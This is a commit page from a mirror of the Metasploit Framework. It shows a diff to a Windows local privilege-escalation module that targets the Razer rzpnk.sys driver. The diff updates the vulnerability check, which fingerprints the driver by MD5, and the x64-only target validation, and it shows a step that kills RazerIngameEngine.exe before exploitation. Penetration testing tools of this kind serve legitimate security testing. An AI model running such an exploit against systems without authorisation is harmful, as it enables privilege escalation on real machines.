infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update the pre-exploit check conditions

bug/bundler_fix
Spencer McIntyre 2017-07-15 14:48:54 -04:00
parent 833b2a67d4
commit b4813ce2c7
1 changed files with 19 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

31
modules/exploits/windows/local/razer_zwopenprocess.rb
View File

@ -70,15 +70,22 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def check def check
pid = session.sys.process['RazerIngameEngine.exe'] # Validate that the driver has been loaded and that
session.sys.process.kill(pid) unless pid.nil? # the version is the same as the one expected
client.sys.config.getdrivers.each do |d|
if d[:basename].downcase == 'rzpnk.sys'
expected_checksum = 'b4598c05d5440250633e25933fff42b0'
target_checksum = client.fs.file.md5(d[:filename])
pid = session.sys.process['winlogon.exe'] if expected_checksum == Rex::Text.to_hex(target_checksum, '')
handle = get_handle(pid) return Exploit::CheckCode::Appears
return Exploit::CheckCode::Safe if handle.nil? else
return Exploit::CheckCode::Detected
end
end
end
session.railgun.kernel32.CloseHandle(handle) Exploit::CheckCode::Safe
Exploit::CheckCode::Vulnerable
end end
def exploit def exploit
@ -90,14 +97,14 @@ class MetasploitModule < Msf::Exploit::Remote
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end end
if sysinfo['Architecture'] =~ /wow64/i if session.platform != 'windows'
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
elsif sysinfo['Architecture'] == ARCH_X86 elsif session.arch != ARCH_X64
fail_with(Failure::NoTarget, 'Session host is x86, but only x64 targets are supported') fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')
end end
pid = session.sys.process['RazerIngameEngine.exe'] pid = session.sys.process['RazerIngameEngine.exe']
unless pid.nil? if pid
# if this process is running, the IOCTL won't work but the process runs # if this process is running, the IOCTL won't work but the process runs
# with user privileges so we can kill it # with user privileges so we can kill it
print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...") print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")